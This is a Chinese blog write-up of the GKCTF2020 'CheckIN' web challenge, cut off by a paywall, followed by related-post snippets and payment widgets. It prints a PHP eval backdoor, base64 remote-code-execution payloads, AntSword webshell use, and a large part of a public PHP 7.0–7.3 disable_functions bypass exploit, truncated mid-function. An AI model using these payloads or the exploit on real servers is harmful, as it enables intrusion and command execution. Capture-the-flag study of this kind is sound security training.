GKCTF2020 web+misc

最新推荐文章于 2023-07-27 13:32:58 发布
最新推荐文章于 2023-07-27 13:32:58 发布
阅读量1.1k 收藏
点赞数
分类专栏: 复现wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44348894/article/details/106334635
版权

文章目录

web

CheckIN

考点:代码审计,绕disable_functions

题目给了源码:

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
   
        public $code = null;
        public $decode = null;
        function __construct()
        {
   z
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
   
                return $_REQUEST;
        }
}
new ClassName();

__construct()中,传入Ginkgo参数,会被base64_decode,所以先base64编码一下RCE:

phpinfo();->cGhwaW5mbygpOw==

得到phpinfo()回显。
在disable_function看出禁用了很多函数。
先遍历一下目录:
payload:

?Ginkgo=dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==

dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==var_dump(scandir('../../../../'));的base64编码,得到:

在这里插入图片描述
可以看到有一个readflag文件。连上蚁剑(话说我为什么扫目录):
在这里插入图片描述
编码器选择base64可能不行,之前就卡这了,官方wp给出了一个自己写的编码器:
在这里插入图片描述
编码器选择自己的,连接成功:
在这里插入图片描述
果真执行不了。那就是绕disable_function了,有现成exp:
链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
利用:

<?php



# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)

#

# Bug: https://bugs.php.net/bug.php?id=72530

#

# This exploit should work on all PHP 7.0-7.3 versions

#

# Author: https://github.com/mm0r1
pwn("echo `/readflag` > /tmp/flag.txt");//执行/readflag,把值写到flag.txt
function pwn($cmd) {
   
    global $abc, $helper;
    function str2ptr(&$str, $p = 0, $s = 8) {
   
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
   
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }
    function ptr2str($ptr, $m = 8) {
   
        $out = "";
        for ($i=0; $i < $m; $i++) {
   
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }
    function write(&$str, $p, $v, $n = 8) {
   
        $i = 0;
        for($i = 0; $i < $n; $i++) {
   
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }
    function leak($addr, $p = 0, $s = 8) {
   
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) {
    $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }
    function parse_elf($base) {
   
        $e_type = leak($base, 0x10, 2);
        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);
        for($i = 0; $i < $e_phnum; $i++) {
   
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);
            if($p_type == 1 && $p_flags == 6) {
    # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags
最低0.47元/天 解锁文章
k0f1i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj WEB +MISC writeup
Ni9htMar3的博客
12-26 7258
WEB PORT 51 Login LOCALHOST 神盾局的秘密 IN a mess Easy Gallery Simple Injection 方法一 方法二 api的调用 PHPINFO
GKCTF2020web
conelly的博客
03-26 313
[GKCTF2020]cve版签到 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。如果URL包含零(\ 0)字符,则 URL将被静默地截断。 这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 先访问本地主机,用%00截断 /?url=http://127.0.0.1%00www.ctfhub.com 提示要以123结尾 /?url=h
GKCTF2020 WEB
fly夏天的博客
06-02 1344
比赛的时候一道题也没做出来,现在看着大佬的wp做一波复现。 1.CheckIn 很明显的一道代码审计题。通过传入base64编码的Ginkgo参数即可执行eval函数。 用蚁剑连接 构造Ginkgo=QGV2YWwoJF9QT1NUWzFdKTs%3d (@eval($_POST[1]); 的base64编码) 发现根目录下存在 flag但是无法打开(权限不足) 同时发现了readflag文件,打开发现是一个程序,包含了cat /flag之类的内容猜测是通过执行该文件来进行读...
GKCTF 2020(web)
weixin_43610673的博客
05-25 619
菜逼只能赛后复现 CheckIN Base64后即可rec,可以读文件,但不知道flag文件位置 看一下phpinfo 命令执行的函数都给ban完了 用蚁剑链接?Ginkgo=ZXZhbCgkX1BPU1RbY21kXSk7 连接成功之后根目录有readflag,和flag 那就是要执行readflag文件 PHP 7.0-7.3 disable_functions bypasss 直接打 改一下命令就行 Exp要传到/tmp 目录 别的没权限 页面去包含执行 老八小超市儿 和这个基本差不多
GKCTF 2020 re
qq_37439229的博客
05-25 527
周末打了两场比赛 bjd GK,bjd我打自闭了,赛中只做出了两道题,赛后又才又做出一道。。。不得不说按道理我四道题都看懂了,知道方法怎么做,可是我不会写脚本啊。。。得加强python的编程能力了。。。 来说说GKCTF,(虽然还是只做出了3道题。。。。啥时能做到ak啊!!!!) checkin 密码HelloWorld,之后砖块游戏好了 Chelly’s identity 老二次元了。。。。 方法:动态调试,比较简单 a = [0x2,0x3,0x5,0x7,0xb,0xd,0x11,0x13
CTF资料web题型及其理论+misc日志分析
03-25
CTF资料web题型及其理论+misc日志分析
MEGA+616+FireFog+Magic+8bit+Misc+-+NeatWolfs+Pack01+v2.2
08-24
《Unity3D中的粒子系统深度解析——以"MEGA+616+FireFog+Magic+8bit+Misc+-+NeatWolfs+Pack01+v2.2"为例》 Unity3D作为一款强大的游戏开发引擎,其内置的粒子系统是创造各种视觉特效的关键工具。"MEGA+616+FireFog+...
2020年12月20日-河南省金盾杯 JDBCTF Crypto+Misc题目打包
12-21
【标题】2020年12月20日的“河南省金盾杯 JDBCTF Crypto+Misc题目打包”是一场网络安全竞赛的题目集合,主要涵盖了密码学(Crypto)和杂项(Misc)两大类别。这样的比赛通常旨在检验参赛者在信息安全领域的综合能力...
ctf之misc所需要工具
06-05
基本包含了所有misc所需要的工具,还有很多在线工具,自行百度即可 (绝对不吃亏,如果还觉得少了请联系我)
misc.xml
03-09
misc.xml
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
GKCTF2020_web
ChenZIDu的博客
05-25 725
不完整,先把打出来的题目写一下,再写复现的好了 CheckIN 源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->cod
[GKCTF2020]BabyDriver
weixin_47158947的博客
08-05 610
1.用ida打开, 上面什么失败成功就不说了,但是倒数第二行的好像之前做过的maze。。看看这个********** 真的是迷宫,而且只能有一种路径,要不然flag就不一样了。 __int64 __fastcall sub_140001380(__int64 a1, __int64 a2) { __int64 v2; // rbx __int64 v3; // rdi __int64 v4; // rax int v5; // ecx __int16 *v6; // rsi __in
GKCTF2020 - Web(老八小超市儿)
ximo的博客
03-17 203
[GKCTF2020]老八小超市儿 基于shopxo开源系统的题目,默认登录后台为admin.php。 账号:admin 密码:shopxo 在这个页面上传zip文件,给了下载链接。 在zip文件的\default\_static_目录下上传木马文件: 上传,访问php文件(/public/static/index/default/ctf.php): 使用蚁剑进行连接: 在跟目录下存在flag,但是是个假的。 还有一个flag.hint文件: 获得root?,说明flag在root目录下,但是没有
速刷ctfshow萌新计划 web+misc(23届不用谢我)
m0_55400802的博客
07-27 542
明天回四平。整个暑假歇了5天(流汗黄豆
部分WP-GKCTF2020
~airrudder~
05-24 6197
本篇内容 MISC: [GKCTF2020]签到 [GKCTF2020]Pokémon [GKCTF2020]问卷调查 [GKCTF2020]code obfuscation Crypto: [GKCTF2020]小学生的密码学 [GKCTF2020]汉字的秘密 [GKCTF2020]babycrypto Web: [GKCTF2020]CheckIN [GKCTF2020]老八小超市儿 Reverse: [GKCTF2020]Check_1n 上一篇 | 目录 | 下一篇 [GKC.
GKCTF2020部分题解
羽的博客
05-24 4692
WEB [GKCTF2020]CheckIN 查看源代码发现没有任何限制,首先尝试传入phpinfo();的base64成功回显 那我们直接传 eval($_POST[1]);的base64然后蚁剑连接即可(Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==) 在根目录下发现flag和readflag 但是没有权限读取和运行,再仔细看下phpinfo中的信息发现禁用了命令执行的函数,这里给出大神们写的绕过dis_func的php代码 链接:https://pan.baidu.com/s/12
GKCTF2020笔记
克格莫
06-03 290
Crypto CTF还是要多做,不然就会吃没见识的亏 1.小学生的密码学 e(x)=11x+6(mod26) 密文:welcylk(flag为base64形式) 这题是典型的仿射密码。 上代码: 然后得到flag{c29yY2VyeQ==}
GKCTF2020 - Web(cve版签到)
ximo的博客
03-16 620
[GKCTF2020]cve版签到 考点:cve-2020-7066与漏洞的利用。 漏洞原理: 在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 get_headers()返回一个数组,其中包含服务器响应HTTP请求而发送的标头。示例
webmisc那个就业
最新发布
09-19
在当今的数字时代,WebMisc(其他)领域都是就业市场上具有潜力和广阔发展空间的行业。 首先,在Web领域,随着互联网的不断发展和普及,对于网站的需求也越来越大。从企业的官方网站到电子商务平台,从社交媒体到在线教育,无处不体现出Web技术和网站设计的重要性。因此,Web开发人员和设计师的需求日益增加。具备良好的前端和后端开发技术、熟悉各种Web框架和语言,以及对用户体验和界面设计有深入了解的人才,将具有更多的就业机会。同时,随着移动互联网的兴起,响应式网页设计和移动应用开发也成为就业的热门方向。 另一方面,在Misc领域,虽然概括性较广,但却存在许多与Web相关的就业机会。比如数据分析、人工智能和机器学习等领域,这些都需要大量的数据处理、算法优化以及模型设计能力。同时,网络安全、信息管理和数字化营销等专业领域也对有相关技术和知识的人才有较高的需求。此外,还有许多具体领域中的Misc工作,例如网络运维、数据库管理、系统架构设计等,也都需要有技术能力和专业知识的专业人才来支持和推动。 总结来说,WebMisc领域都有很好的就业前景。随着技术的发展和需求的增加,这两个领域所涉及的工作岗位将不断增加。对于有相关技术、技能和知识的人才来说,他们将有机会在这些领域找到一份稳定的工作,并在未来的职业发展中获得更多的机会和成长。因此,不管是选择Web还是Misc领域,学习和掌握相关的技术与知识,将为自己的就业前景打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值